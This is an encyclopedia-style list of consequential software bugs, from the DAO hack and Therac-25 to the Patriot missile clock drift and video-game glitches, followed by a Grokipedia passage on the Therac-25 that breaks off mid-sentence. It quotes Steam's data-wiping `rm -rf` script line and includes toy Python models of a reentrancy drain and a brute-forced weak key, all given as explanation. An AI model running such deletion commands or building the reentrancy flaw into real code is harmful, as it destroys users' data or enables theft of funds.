List of software bugs
from Wikipedia
Many software bugs are merely annoying or inconvenient, but some can have extremely serious consequences—either financially or as a threat to human well-being.[1] The following is a list of software bugs with significant consequences.
Administration
- The software of the A2LL system for handling unemployment and social services in Germany exhibited several errors with large-scale consequences, such as sending payments to invalid account numbers in 2004.[citation needed]
Blockchain
- The DAO bug. On June 17, 2016, the DAO was subjected to an attack exploiting a combination of vulnerabilities, including one concerning recursive calls, that resulted in the transfer of 3.6 million Ether – around a third of the 11.5 million Ether that had been committed to The DAO – valued at the time at around $50M.[2][3]
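The recursive-call vulnerability behind the DAO attack can be illustrated with a toy Python model (not Solidity; the class names and amounts are invented for illustration): the contract sends funds before zeroing the caller's balance, so a receiver that re-enters withdraw() during the payout drains more than its deposit.

```python
class VulnerableVault:
    """Toy Python model (not Solidity) of the recursive-call flaw:
    funds are sent before the caller's balance is zeroed, so a receiver
    that re-enters withdraw() during the payout drains extra funds."""
    def __init__(self):
        self.balances = {}
        self.total = 0

    def deposit(self, who, amount):
        self.balances[who] = self.balances.get(who, 0) + amount
        self.total += amount

    def withdraw(self, who, receive_callback):
        amount = self.balances.get(who, 0)
        if amount > 0 and self.total >= amount:
            self.total -= amount     # pay out first...
            receive_callback()       # ...external call can re-enter here...
            self.balances[who] = 0   # ...and the balance is zeroed too late

class Attacker:
    def __init__(self, vault, depth):
        self.vault, self.depth, self.stolen = vault, depth, 0

    def receive(self):
        self.stolen += 10            # payout received
        if self.depth > 0:           # re-enter before the balance is zeroed
            self.depth -= 1
            self.vault.withdraw("attacker", self.receive)

vault = VulnerableVault()
vault.deposit("victim", 100)
vault.deposit("attacker", 10)
attacker = Attacker(vault, depth=3)
vault.withdraw("attacker", attacker.receive)
# attacker.stolen is 40: four payouts of 10 from a single 10 deposit
```

The fix mirrors the standard "checks-effects-interactions" pattern: zero the balance before making the external call.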
Electric power transmission
- The Northeast blackout of 2003 was triggered by a local outage that went undetected due to a race condition in General Electric Energy's XA/21 monitoring software.[4]
Encryption
See also Category:Computer security exploits
- In order to fix a warning issued by Valgrind, a maintainer of Debian patched OpenSSL and broke the random number generator in the process. The patch was uploaded in September 2006 and made its way into the official release; it was not reported until April 2008. Every key generated with the broken version is compromised (as the "random" numbers were made easily predictable), as is all data encrypted with it, threatening many applications that rely on encryption such as S/MIME, Tor, SSL or TLS protected connections and SSH.[5]
- Heartbleed, an OpenSSL vulnerability introduced in 2012 and disclosed in April 2014, removed confidentiality from affected services, causing among other things the shutdown of the Canada Revenue Agency's public access to the online filing portion of its website[6] following the theft of social insurance numbers.[7]
- The Apple "goto fail" bug was a duplicated line of code which caused a public key certificate check to pass a test incorrectly.
- The GnuTLS "goto fail" bug was similar to the Apple bug and found about two weeks later. The GnuTLS bug also allowed attackers to bypass SSL/TLS security.[8]
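The Debian OpenSSL break comes down to seed-space size: with the entropy mixing patched out, key generation depended (essentially) only on the process ID. The sketch below uses a hypothetical `toy_keygen` function, not OpenSSL's actual RNG, purely to show why a PID-sized seed space is brute-forceable.

```python
import hashlib

def toy_keygen(pid: int) -> bytes:
    """Hypothetical stand-in for the broken generator: with the entropy
    mixing patched out, the output depends (essentially) only on the
    process ID, which is at most 32768 on a default Linux system."""
    return hashlib.sha256(f"pid={pid}".encode()).digest()

victim_key = toy_keygen(1337)   # generated with a PID unknown to the attacker

# The attacker simply enumerates the entire seed space.
recovered_pid = next(pid for pid in range(1, 32769)
                     if toy_keygen(pid) == victim_key)
```

At most 32,768 trials recover any key, which is why every key generated by the broken package had to be treated as compromised.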
Finance
- The Vancouver Stock Exchange index had large errors due to repeated rounding. In January 1982 the index was initialized at 1000 and subsequently updated and truncated to three decimal places on each trade. This was done about 3000 times a day. The accumulated truncations led to an erroneous loss of around 25 points per month. Over the weekend of November 25–28, 1983, the error was corrected, raising the value of the index from its Friday closing figure of 524.811 to 1098.892.[9][10]
- Knight Capital Group lost $440 million in 45 minutes on August 1, 2012 due to the improper deployment of software on servers and the re-use of a critical software flag that caused old unused software code to execute during trading.[11]
- The British Post Office scandal; between 2000 and 2015, 736 subpostmasters were prosecuted by the UK Post Office, with many falsely convicted and sent to prison. The subpostmasters were blamed for financial shortfalls which actually were caused by software defects in the Post Office's Horizon accounting software.[12]
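The Vancouver index drift is easy to reproduce in a toy simulation. The per-trade move distribution below is invented for illustration, but the downward bias from truncation (on average half of the last retained digit, about 0.0005 per trade) is the documented mechanism.

```python
import math
import random

def truncate3(x: float) -> float:
    # Truncate (not round) to three decimal places, as the exchange's
    # software did after every trade.
    return math.floor(x * 1000) / 1000

random.seed(42)
exact = truncated = 1000.0
for _ in range(3000 * 20):                  # ~3000 trades/day for ~a month
    delta = random.uniform(-0.005, 0.005)   # hypothetical per-trade move
    exact += delta
    truncated = truncate3(truncated + delta)

# Truncation always discards value (~0.0005 per trade on average), so the
# index drifts steadily below its true value: roughly 1.5 points per
# trading day, dozens of points per month.
```

Rounding to the nearest thousandth instead of truncating would have made the per-trade error unbiased, which is essentially the fix the exchange applied in November 1983.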
Media
- In the Sony BMG copy protection rootkit scandal (October 2005), Sony BMG produced a Van Zant music CD that employed a copy protection scheme that covertly installed a rootkit on any Windows PC that was used to play it. Their intent was to hide the copy protection mechanism to make it harder to circumvent. Unfortunately, the rootkit inadvertently opened a security hole resulting in a wave of successful trojan horse attacks on the computers of those who had innocently played the CD.[13] Sony's subsequent efforts to provide a utility to fix the problem actually exacerbated it.[14]
Medical
- A bug in the code controlling the Therac-25 radiation therapy machine was directly responsible for at least five patient deaths in the 1980s when it administered excessive quantities of beta radiation.[15][16][17]
- Radiation therapy planning software RTP/2 created by Multidata Systems International could incorrectly double the dosage of radiation depending on how the technician entered data into the machine. At least eight patients died, while another 20 received overdoses likely to cause significant health problems (November 2000).[18]
- A Medtronic heart device was found vulnerable to remote attacks (March 2008).[19]
- The Becton Dickinson Alaris Gateway Workstation allows unauthorized arbitrary remote execution (2019).[20][21]
- The CareFusion Alaris pump module (8100) will not properly delay an infusion when the "Delay Until" option or "Multidose" feature is used (2015).[22]
Military
- A software error in the MIM-104 Patriot caused its system clock to drift by one third of a second over a period of one hundred hours – resulting in failure to locate and intercept an incoming Iraqi Al Hussein missile, which then struck barracks in Dhahran, Saudi Arabia (February 25, 1991), killing 28 Americans.[23][24]
- A Royal Air Force Chinook helicopter crashed into the Mull of Kintyre in June 1994, killing 29. Initially, the crash was dismissed as pilot error, but an investigation by Computer Weekly uncovered sufficient evidence to convince a House of Lords inquiry that it may have been caused by a software bug in the aircraft's engine control computer.[25]
- Smart ship USS Yorktown was left dead in the water in September 1997 for nearly 3 hours after a divide by zero error.[26]
- In April 1992 the first Lockheed YF-22 crashed while landing at Edwards Air Force Base, California. The cause of the crash was found to be a flight control software error that failed to prevent a pilot-induced oscillation.[27]
- While attempting its first overseas deployment to the Kadena Air Base in Okinawa, Japan, on 11 February 2007, a group of six F-22 Raptors flying from Hickam AFB, Hawaii, experienced multiple computer crashes coincident with their crossing of the 180th meridian of longitude (the International Date Line). The computer failures included at least navigation (completely lost) and communication. The fighters were able to return to Hawaii by following their tankers, something that might have been problematic had the weather not been good. The error was fixed within 48 hours, allowing a delayed deployment.[28]
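The Patriot clock drift cited above can be reproduced in a few lines. This is a sketch of the commonly cited analysis (a 0.1 s tick chopped to a 24-bit fixed-point value, modeled here as 23 fraction bits); the exact register layout is an assumption, not flight code.

```python
# 1/10 has no finite binary expansion (0.000110011...), so chopping it
# to a fixed number of bits loses a tiny amount on every tick.
FRACTION_BITS = 23
chopped_tenth = int(0.1 * 2**FRACTION_BITS) / 2**FRACTION_BITS
error_per_tick = 0.1 - chopped_tenth        # ~9.5e-8 s lost per 0.1 s tick

ticks = 100 * 3600 * 10                     # 100 hours at 10 ticks/second
drift = ticks * error_per_tick              # ~0.34 s accumulated clock error
```

A third of a second is negligible for a wall clock but, multiplied by the closing speed of a ballistic missile, it moved the predicted intercept point outside the radar's tracking gate.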
Space
- NASA's 1965 Gemini 5 mission landed 80 miles (130 km) short of its intended splashdown point when the pilot compensated manually for an incorrect constant for the Earth's rotation rate. A 360-degree rotation corresponding to the Earth's rotation relative to the fixed stars was used instead of the 360.98-degree rotation in a 24-hour solar day. The shorter length of the first three missions and a computer failure on Gemini 4 prevented the bug from being detected earlier.[29]
- The Russian Space Research Institute's Phobos 1 (Phobos program) deactivated its attitude thrusters and could no longer properly orient its solar arrays or communicate with Earth, eventually depleting its batteries. (September 10, 1988).[30]
- The European Space Agency's Ariane flight V88 was destroyed 40 seconds after takeoff (June 4, 1996). The first flight of the Ariane V rocket self-destructed due to an overflow occurring during a floating-point to integer conversion in the on-board guidance software. The same software had been used successfully in the Ariane IV program, but the Ariane V produced larger values for at least one variable, causing the overflow.[31][32]
- In 1997, the Mars Pathfinder mission was jeopardised by a bug in concurrent software shortly after the rover landed, which was found in preflight testing but given a low priority as it only occurred in certain unanticipated heavy-load conditions.[33] The problem, which was identified and corrected from Earth, was due to computer resets caused by priority inversion.[34]
- In 2000, a Zenit 3SL launch failed due to faulty ground software not closing a valve in the rocket's second stage pneumatic system.[35]
- The European Space Agency's CryoSat-1 satellite was lost in a launch failure in 2005 due to a missing shutdown command in the flight control system of its Rokot carrier rocket.[36]
- NASA Mars Polar Lander was destroyed because its flight software mistook vibrations caused by the deployment of the stowed legs for evidence that the vehicle had landed and shut off the engines 40 meters from the Martian surface (December 3, 1999).[37]
- Its sister spacecraft Mars Climate Orbiter was also destroyed, due to software on the ground generating commands based on parameters in pound-force (lbf) rather than newtons (N).
- A mis-sent command from Earth caused the software of the NASA Mars Global Surveyor to incorrectly assume that a motor had failed, causing it to point one of its batteries at the sun. This caused the battery to overheat (November 2, 2006).[38][39]
- NASA's Spirit rover became unresponsive on January 21, 2004, a few weeks after landing on Mars. Engineers found that too many files had accumulated in the rover's flash memory. It was restored to working condition after deleting unnecessary files.[40]
- Japan's Hitomi astronomical satellite was destroyed on March 26, 2016, when a thruster fired in the wrong direction, causing the spacecraft to spin faster instead of stabilize.[41]
- The ESA/Roscosmos Schiaparelli Mars lander impacted the surface of Mars. Unanticipated spin during descent briefly saturated the IMU; the software then misinterpreted the data as showing the lander was below the surface, so it prematurely ejected the parachute and shut down the engines, resulting in the crash.[42]
- Israel's first attempt to land an uncrewed spacecraft on the Moon with Beresheet failed on April 11, 2019, due to a software bug in its engine system, which prevented the spacecraft from slowing during its final descent to the Moon's surface. Engineers attempted to correct the problem by remotely rebooting the engine, but by the time they regained control, Beresheet could not slow down in time to avert a hard crash landing that disintegrated it.[43]
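The Ariane V failure mode, an unchecked numeric conversion whose input range grew between programs, can be sketched as follows. The values are illustrative, not flight data; the real code was Ada and the variable was a horizontal-bias term.

```python
INT16_MIN, INT16_MAX = -2**15, 2**15 - 1

def to_int16_checked(value: float) -> int:
    """Model of a 64-bit float to signed 16-bit conversion that, like the
    Ada code, raises (an "Operand Error") rather than silently wrapping
    when the value does not fit."""
    n = int(value)
    if not INT16_MIN <= n <= INT16_MAX:
        raise OverflowError("Operand Error: value exceeds 16-bit range")
    return n

to_int16_checked(20000.0)       # a value at Ariane IV scale fits
overflowed = False
try:
    to_int16_checked(50000.0)   # the Ariane V's larger value does not
except OverflowError:
    overflowed = True           # unhandled in flight, this halted the computer
```

The conversion had been proven safe for Ariane IV trajectories; reusing it without re-validating the input range against Ariane V's flight profile is what turned a routine conversion into a mission loss.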
Telecommunications
- AT&T long-distance network crash (January 15, 1990), in which the failure of one switching system would cause a message to be sent to nearby switching units to tell them that there was a problem. Unfortunately, the arrival of that message would cause those other systems to fail too – resulting in a cascading failure that rapidly spread across the entire AT&T long-distance network.[44][45]
- In January 2009, Google's search engine erroneously notified users that every web site worldwide was potentially malicious, including its own.[46]
- In May 2015, iPhone users discovered a bug whereby sending a certain sequence of characters and Unicode symbols in a text message to another iPhone user would crash the receiving iPhone's SpringBoard interface,[47] and could also crash the entire phone, induce a factory reset, or significantly disrupt the device's connectivity,[48] preventing it from functioning normally. The bug persisted for weeks and gained substantial notoriety, with a number of individuals using it to play pranks on other iOS users,[citation needed] before Apple patched it on June 30, 2015, with iOS 8.4.
- On May 31, 2020, the user @UniverseIce on Twitter reported a wallpaper[49] that caused certain Android phones to go into a bootloop that rendered them unusable.[50] This was caused by an oversight in Android's SystemUI in how it converted wallpaper images from ProPhoto RGB to sRGB,[51] which led the system to try to display a pixel with an invalid color value.[52][53]
Tracking years
- The year 2000 problem spawned fears of worldwide economic collapse and an industry of consultants providing last-minute fixes.[54]
- A similar problem will occur in 2038 (the year 2038 problem), as many Unix-like systems calculate the time in seconds since 1 January 1970 and store this number as a 32-bit signed integer, whose maximum possible value is 2³¹ − 1 (2,147,483,647) seconds.[55] 2,147,483,647 seconds is about 68 years, and 2038 is 68 years after 1970.
- An error in the payment terminal code for Bank of Queensland rendered many devices inoperable for up to a week. The problem was traced to an incorrect hexadecimal number conversion routine. When the date ticked over to 2010, the device skipped six years to 2016, causing terminals to decline customers' cards as expired.[56]
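Both date bugs above reduce to small integer arithmetic. A minimal illustration follows; the Bank of Queensland fault is modeled here simply as a decimal year field run through a hexadecimal conversion, which matches the described symptom rather than the terminal's actual code.

```python
from datetime import datetime, timedelta, timezone

# Year 2038: the largest value a 32-bit signed time_t can hold.
epoch = datetime(1970, 1, 1, tzinfo=timezone.utc)
rollover = epoch + timedelta(seconds=2**31 - 1)
# rollover is 2038-01-19 03:14:07 UTC; one second later the counter wraps.

# Bank of Queensland-style fault: parsing the decimal year field "10"
# (for 2010) as hexadecimal yields 16, i.e. the year 2016.
misparsed_year = int("10", 16)
```

The same two-digit-field fragility that drove Y2K remediation reappears in any routine that mixes decimal and hexadecimal (or BCD) encodings of dates.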
Transportation
- By some accounts Toyota's electronic throttle control system (ETCS) had bugs that could cause sudden unintended acceleration.[57]
- The Boeing 787 Dreamliner experienced an integer overflow bug which could shut down all electrical generators if the aircraft were to be kept "on" for more than 248 days.[58] A similar problem was found to exist in the Airbus A350, which needs to be powered down before reaching 149 continuous hours of power-on time, otherwise certain avionics systems or functions would partially or completely fail.[59]
- In early 2019, the transportation-rental firm Lime discovered a firmware bug in its electric scooters that could cause them to brake very hard unexpectedly, throwing and injuring riders.[60]
- Boeing 737 NG had all cockpit displays go blank if a specific type of instrument approach to any one of seven specific airports was selected in the flight management computer.[61]
- Bombardier CRJ-200 equipped with flight management systems by Collins Aerospace would make wrong turns during missed approach procedures executed by the autopilot in some specific cases when temperature compensation was activated in cold weather.[62]
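The 248-day limit in the Boeing 787 entry above is consistent with a signed 32-bit counter of hundredths of a second overflowing. That unit is a widely repeated inference rather than a published Boeing detail, so treat the sketch below as an assumption-labeled reconstruction of the arithmetic.

```python
# Assumption: generator-controller uptime kept in a signed 32-bit counter
# of hundredths of a second (centiseconds).
seconds_to_overflow = (2**31 - 1) / 100
days_to_overflow = seconds_to_overflow / 86400   # ~248.55 days
```

The same back-of-the-envelope check works for any "reboot every N days" advisory: N almost always factors into a power of two divided by a tick rate.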
Video gaming
- Eve Online's deployment of the Trinity patch erased the boot.ini file from several thousand users' computers, rendering them unable to boot. The game used a legacy file of its own that was also named boot.ini, and the deletion targeted the file in the drive's root directory instead of the game's /eve directory.[63]
- The Corrupted Blood incident was a software bug in World of Warcraft that caused a deadly, debuff-inducing virtual disease that could only be contracted during a particular raid to be set free into the rest of the game world, leading to numerous, repeated deaths of many player characters. This caused players to avoid crowded places in-game, just like in a "real world" epidemic, and the bug became the center of some academic research on the spread of infectious diseases.[64]
- On June 6, 2006, the online game RuneScape suffered from a bug that enabled certain player characters to kill and loot other characters who were unable to fight back. The game still considered the attackers to be in player-versus-player mode after they were kicked out of a combat ring in the house of a player who was suffering from lag while celebrating an in-game accomplishment. Players killed by the glitched characters lost many items, and the bug was so devastating that the players abusing it were soon tracked down, caught and permanently banned from the game, but not before they had laid waste to the region of Falador, christening the bug the "Falador Massacre".[65]
- In the 256th level of Pac-Man, a bug results in a kill screen. The level counter is stored in a single byte, so level 256 rolls over to zero; the routine that draws the (at most seven) fruit icons then overruns its table, turning the entire right side of the screen into a jumbled mess of symbols while the left side remains normal.[66]
- Upon initial release, the ZX Spectrum game Jet Set Willy was impossible to complete because of a severe bug that corrupted the game data, causing enemies and the player character to be killed in certain rooms of the large mansion where the entire game takes place.[67] The bug, known as "The Attic Bug", would occur when the player entered the mansion's attic, which would then cause an arrow to travel offscreen, overwriting the contents of memory and altering crucial variables and behavior in an undesirable way. The game's developers initially excused this bug by claiming that the affected rooms were death traps, but ultimately owned up to it and issued instructions to players on how to fix the game itself.[68]
- One of the free demo discs issued to PlayStation Underground subscribers in the United States contained a serious bug in the demo for Viewtiful Joe 2 that would not only crash the PlayStation 2, but would also unformat any memory cards plugged into the console, erasing any and all saved data on them.[69] The bug was so severe that Sony had to apologize for it and send out free copies of other PS2 games to affected players as consolation.[70]
- Due to a severe programming error, much of the Nintendo DS game Bubble Bobble Revolution is unplayable because a mandatory boss fight fails to trigger in the 30th level.[71]
- An update for the Xbox 360 version of Guitar Hero II, which was intended to fix some issues with the whammy bar on that game's guitar controllers, came with a bug that caused some consoles to freeze, or even stop working altogether, producing the infamous "red ring of death".[72]
- Valve's Steam client for Linux could accidentally delete all of the user's files in every directory on the computer. This happened to users who had moved Steam's installation directory.[73] The bug is the result of unsafe shell-script programming:

```
STEAMROOT="$(cd "${0%/*}" && echo $PWD)"   # Scary!
rm -rf "$STEAMROOT/"*
```

The first line tries to find the script's containing directory from the "selfpath" variable `$0`. This could fail, for example if the directory was moved while the script was running. It would also fail if `$0` contained no slash character, or contained a broken symlink, perhaps mistyped by the user. The way it would fail, as ensured by the `&&` conditional and the absence of `set -e` (which would cause termination on failure), was to produce the empty string. This failure mode was not checked, only commented as "Scary!". Finally, in the deletion command, the slash character takes on a very different meaning from its role as path concatenation operator when the string before it is empty, as it then names the root directory.
- Minus World is an infamous glitch level from the 1985 game Super Mario Bros., accessed by using a bug to clip through walls in level 1–2 to reach its "warp zone", which leads to the said level.[74] As this level is endless, triggering the bug that takes the player there makes the game impossible to continue until the player resets the game or runs out of lives.
- "MissingNo." is a glitch Pokémon species present in Pokémon Red and Blue, which can be encountered by performing a particular sequence of seemingly unrelated actions. Capturing this Pokémon may corrupt the game's data, according to Nintendo[75][76][77] and some of the players who successfully attempted this glitch. This is one of the most famous bugs in video game history, and continues to be well-known.[78]
References
- ^ "Why Software fails". IEEE Spectrum: Technology, Engineering, and Science News. 2 September 2005. Retrieved 2021-03-20.
- ^ Popper, Nathaniel (17 June 2016). "Hacker May Have Taken $50 Million From Cybercurrency Project". The New York Times. Archived from the original on 20 June 2017. Retrieved 3 March 2017.
- ^ Price, Rob (17 June 2016). "Digital currency Ethereum is cratering amid claims of a $50 million hack". Business Insider. Archived from the original on 11 June 2017. Retrieved 17 June 2016.
- ^ "Software Bug Contributed to Blackout". Archived from the original on 2004-03-13. Retrieved 2008-01-07.
- ^ "DSA-1571-1 openssl -- predictable random number generator". Retrieved 2008-04-16.
- ^ "Heartbleed bug may shut Revenue Canada website until weekend". CBC News. 2014-04-09.
- ^ "Heartbleed bug: 900 SINs stolen from Revenue Canada - Business - CBC News". CBC News. Retrieved 2014-04-14.
- ^ Goodin, Dan (March 4, 2014). "Critical crypto bug leaves Linux, hundreds of apps open to eavesdropping". Ars Technica. Retrieved September 7, 2020.
- ^ Quinn, Kevin (November 8, 1983). "Ever Had Problems Rounding Off Figures? This Stock Exchange Has". The Wall Street Journal. p. 37.
- ^ Wayne, Lilley (November 29, 1983). "Vancouver stock index has right number at last". The Toronto Star.
- ^ Popper, Nathaniel (2 August 2012). "Knight Capital Says Trading Glitch Cost It $440 Million". New York Times.
- ^ Flinders, Karl (3 March 2022). "Post Office warned of software flaw in 2006, but failed to alert subpostmaster network". Computer Weekly.
- ^ Borland, John (11 November 2005). "FAQ: Sony's 'rootkit' CDs - CNET News". news.com. Archived from the original on 5 December 2008.
- ^ Russinovich, Mark (4 Nov 2005). "Mark's Blog : More on Sony: Dangerous Decloaking Patch, EULAs and Phoning Home". blogs.technet.com. Archived from the original on 3 January 2007.
- ^ "The Therac-25 Accidents (PDF), by Nancy Leveson" (PDF). Retrieved 2008-01-07.
- ^ "An Investigation of the Therac-25 Accidents (IEEE Computer)". Retrieved 2008-01-07.
- ^ "Computerized Radiation Therapy (PDF) reported by TROY GALLAGHER" (PDF). Retrieved 2011-12-12.
- ^ Garfinkel, Simson (November 8, 2005). "History's Worst Software Bugs". Wired. Retrieved September 6, 2020.
- ^ Feder, Barnaby J. (2008-03-12). "A Heart Device Is Found Vulnerable to Hacker Attacks". The New York Times. Retrieved 2008-09-28.
- ^ "ICS Advisory (ICSMA-19-164-01)" (Press release). Cybersecurity and Infrastructure Security Agency. 2019-06-13. Retrieved 2019-11-15.
- ^ Newman, Lily Hay (2019-10-01). "Decades-Old Code Is Putting Millions of Critical Devices at Risk". Wired. Retrieved 2019-11-15.
- ^ "Urgent: Medical Device Recall Notification, AFFECTED DEVICE: Alaris® Pump module (Model 8100)"Delay Until" Option and "Multidose" Feature" (PDF) (Press release). CareFusion. 2014-04-23. Archived from the original (PDF) on 2015-06-12. Retrieved 2019-11-15.
- ^ "Patriot missile defense, Software problem led to system failure at Dharhan, Saudi Arabia; GAO report IMTEC 92-26". US Government Accounting Office.
- ^ Skeel, Robert. "Roundoff Error and the Patriot Missile". SIAM News, volume 25, nr 4. Archived from the original on 2008-08-01. Retrieved 2008-09-30.
- ^ Rogerson, Simon (April 2002). "The Chinook Helicopter Disaster". IMIS Journal. 12 (2). Archived from the original on 2012-07-17.
- ^ "Software glitches leave Navy Smart Ship dead in the water". gcn.com. 13 Jul 1998. Archived from the original on 8 February 2006.
- ^ "F/A-22 Program History". f-22raptor.com. Archived from the original on 25 August 2009.
- ^ "Lockheed's F-22 Raptor Gets Zapped by International Date Line". DailyTech. 26 Feb 2007. Archived from the original on 16 March 2007.
- ^ "Gemini 5". On The Shoulders of Titans: A History of Project Gemini. Archived from the original on 2019-07-14. Retrieved 2019-08-20.
- ^ Sagdeev, R. Z.; Zakharov, A. V. (1989). "Brief history of the Phobos mission". Nature. 341 (6243): 581–585. Bibcode:1989Natur.341..581S. doi:10.1038/341581a0. S2CID 41464654.
- ^ Dowson, M. (March 1997). "The Ariane 5 Software Failure". ACM SIGSOFT Software Engineering Notes. 22 (2): 84. doi:10.1145/251880.251992. S2CID 43439273.
- ^ Jézéquel JM, Meyer B (January 1997). "Design by Contract: The Lessons of Ariane" (PDF). IEEE Computer. 30 (1): 129–130. doi:10.1109/2.562936.
- ^ Heaven, Douglas (2013). "Parallel sparking: Many chips make light work". New Scientist. 219 (2930). Elsevier BV: 42–45. doi:10.1016/s0262-4079(13)62046-1. ISSN 0262-4079.
- ^ Reeves, Glenn E (15 Dec 1997). "What really happened on Mars? -- Authoritative Account". research.microsoft.com. Archived from the original on 30 December 2016.
- ^ "Spaceflight Now | Breaking News | Sea Launch malfunction blamed on software glitch". spaceflightnow.com. Retrieved January 2, 2022.
- ^ "CryoSat Mission lost due to launch failure". European Space Agency. 8 October 2005. Retrieved 19 July 2010.
- ^ "Mars Polar Lander". Archived from the original on 2012-09-27. Retrieved 2008-01-07.
- ^ "Report Reveals Likely Causes of Mars Spacecraft Loss". Archived from the original on 2007-11-09. Retrieved 2008-01-07.
- ^ "Faulty Software May Have Doomed Mars Orbiter". Space.com. Archived from the original on July 24, 2008. Retrieved January 11, 2007.
- ^ "Out of memory problem caused Mars rover's glitch". computerworld.com. February 3, 2004.
- ^ Witze, Alexandra (2016). "Software error doomed Japanese Hitomi spacecraft". Nature. 533 (7601): 18–19. Bibcode:2016Natur.533...18W. doi:10.1038/nature.2016.19835. PMID 27147012. S2CID 4451754.
- ^ Tolker-Nielsen, Toni, ed. (18 May 2017). ExoMars 2016 – Schiaparelli Anomaly Inquiry (Report). European Space Agency. pp. 18–19. DG-I/2017/546/TTN.
- ^ Weitering, Hanneke (12 April 2019). "Israeli Moon Lander Suffered Engine Glitch Before Crash". Space.com. Retrieved 29 May 2019.
- ^ Sterling, Bruce (1993). The Hacker Crackdown: Law and Disorder on the Electronic Frontier. Spectra Books. ISBN 0-553-56370-X.
- ^ "The Crash of the AT&T Network in 1990". Retrieved 2024-02-26.
- ^ Metz, Cade (January 31, 2009). "Google mistakes entire web for malware". The Register. Retrieved December 20, 2010.
- ^ "Bug in iOS Unicode handling crashes iPhones with a simple text". Apple Insider. 26 May 2015. Retrieved 29 May 2015.
- ^ Clover, Juli (26 May 2015). "New iOS Bug Crashing iPhones Simply by Receiving a Text Message". MacRumors. Retrieved 29 May 2015.
- ^ "Sunset At St Mary Lake Glacier National Park 5k Wallpaper,HD Nature Wallpapers,4k Wallpapers,Images,Backgrounds,Photos and Pictures". hdqwalls. Retrieved 2025-09-22.
- ^ @UniverseIce (31 May 2020). Post on X (formerly Twitter). x.com/UniverseIce/status/1266943909499826176. Retrieved 22 September 2025.
- ^ Schoon, Ben (10 June 2020). "[Update: Photographer Speaks Out] Some Android Phones Can Be Bricked Using This Wallpaper". 9to5Google. Retrieved 22 September 2025.
- ^ "Google Issue Tracker". issuetracker.google.com. Retrieved 2025-09-22.
- ^ Mehrotra, Pranob (2020-08-03). "[Update 2: Fixed] This wallpaper triggers a rare bug causing Android devices to bootloop". XDA. Retrieved 2025-09-22.
- ^ "Looking at the Y2K bug, portal on CNN.com". Archived from the original on 2007-12-27. Retrieved 2008-01-07.
- ^ "The year 2038 bug". Retrieved 2008-01-12.
- ^ Stafford, Patrick. "Businesses hit by Bank of Queensland EFTPOS bug". Archived from the original on 7 April 2014. Retrieved 1 April 2014.
- ^ Dunn, Michael (28 Oct 2013). "Toyota's killer firmware: Bad design and its consequences". EDN.
- ^ "To keep a Boeing Dreamliner flying, reboot once every 248 days". Engadget. 1 Apr 2015.
- ^ Corfield, Gareth (25 Jul 2019). "Airbus A350 software bug forces airlines to turn planes off and on every 149 hours". The Register. Retrieved 2021-02-04.
- ^ Roy, Eleanor Ainge (21 February 2019). "Auckland threatens to eject Lime scooters after wheels lock at high speed". The Guardian. Retrieved 2019-02-20.
- ^ Corfield, Gareth (8 Jan 2020). "Blackout Bug: Boeing 737 cockpit screens go blank if pilots land on specific runways". The Register. Retrieved 2021-02-04.
- ^ Corfield, Gareth (29 May 2020). "Software bug in Bombardier airliner made planes turn the wrong way". The Register. Retrieved 2021-02-04.
- ^ "About the boot.ini issue (Dev Blog)". 11 December 2007. Retrieved 2014-09-30.
- ^ Balicer, Ran (2005-10-05). "Modeling Infectious Diseases Dissemination Through Online Role-Playing Games". Epidemiology. 18 (2): 260–261. doi:10.1097/01.ede.0000254692.80550.60. PMID 17301707. S2CID 20959479.
- ^ Bishop, Sam (8 June 2016). "Runescape marks the anniversary of the Falador Massacre". GameFactor. Retrieved 9 August 2018.
- ^ "Pac Man'S Split Screen Level Analyzed And Fixed". Donhodges.Com. Retrieved 2012-09-19.
- ^ Langshaw, Mark (30 September 2010). "Retro Corner: 'Jet Set Willy' (Spectrum)". Digital Spy. Retrieved 30 May 2018.
- ^ "Jet Set Willy Solved!". Personal Computer Games (8): 21. July 1984. Retrieved 2014-04-19.
- ^ Krotoski, Aleks (2004-11-30). "Viewtiful Joe 2 demo deletes memory cards". The Guardian. Retrieved 2009-11-10.
- ^ Bramwell, Tom (2004-12-07). "Sony to replace defective demo discs with games". Eurogamer. Retrieved 2009-11-10.
- ^ "Bubble Bobble Revolution DS production issues confirmed *UPDATE*". GoNintendo. 14 Oct 2006.
- ^ Bramwell, Tom (2007-04-16). "RedOctane admits to Guitar Hero II patch problem". Eurogamer. Retrieved 2016-12-02.
- ^ Paul, Ian (17 Jan 2015). "Scary Steam for Linux bug erases all the personal files on your PC". PCWorld.
- ^ Gach, Ethan (14 November 2016). "The NES Classic Carries Over Classic Glitches". Kotaku Australia. Archived from the original on November 15, 2016. Retrieved 8 March 2017.
- ^ Nintendo. "Customer Service — Specific GamePak Troubleshooting". Archived from the original on January 27, 2008. Retrieved June 7, 2009.
- ^ "Pokechat". Nintendo Power. Vol. 120. May 1999. p. 101.
- ^ Loe, Casey (1999). Pokémon Perfect Guide Includes Red-Yellow-Blue. Versus Books. p. 125. ISBN 1-930206-15-1.
- ^ "Gaming's Top 10 Easter Eggs". IGN. IGN Entertainment. April 9, 2009. p. 2. Archived from the original on June 5, 2010. Retrieved June 7, 2009.
List of software bugs
from Grokipedia
Life-Critical Systems
Therac-25 Radiation Therapy Machine (1985-1987)
The Therac-25 was a computer-controlled dual-mode radiation therapy machine manufactured by Atomic Energy of Canada Limited (AECL), capable of delivering either electron beams or X-ray beams for cancer treatment, with installations beginning in 1982 across the United States and Canada. Between June 3, 1985, and January 17, 1987, six documented accidents occurred involving massive overdoses of radiation, far exceeding intended therapeutic levels of approximately 200 rads; these delivered 8,000 to 25,000 rads in localized areas, resulting in three patient deaths and severe injuries including tissue necrosis and amputations in the others.[6][7] The overdoses stemmed from software flaws that allowed unsafe configurations during operation, particularly in high-energy X-ray mode, where the machine erroneously fired an unmodulated electron beam without the required scattering foil or flattening filter.[6] Central to the failures was a race condition in the multitasking software, adapted with minimal changes from earlier Therac models, where rapid operator inputs during parameter editing—such as changing beam type from electrons ("e") to X-rays ("x") or adjusting dose rates—could desynchronize the control software from hardware positioning commands.[7] This bug, exploitable within seconds via the console interface, caused the multileaf turntable to remain in the wrong position (e.g., aligned for ion chamber verification rather than photon mode), bypassing mechanical safeties absent in the Therac-25 design, unlike its predecessors which retained hardware interlocks.[6] Additional errors included a variable overflow in dose calculation routines (contributing to the January 1987 Yakima incident) and inadequate error handling, where the system displayed vague "Malfunction" codes (e.g., "Malfunction 54") without halting operations or alerting to overdose risks, enabling operators to resume treatments that repeated the fault.[7] AECL initially attributed issues to operator error 
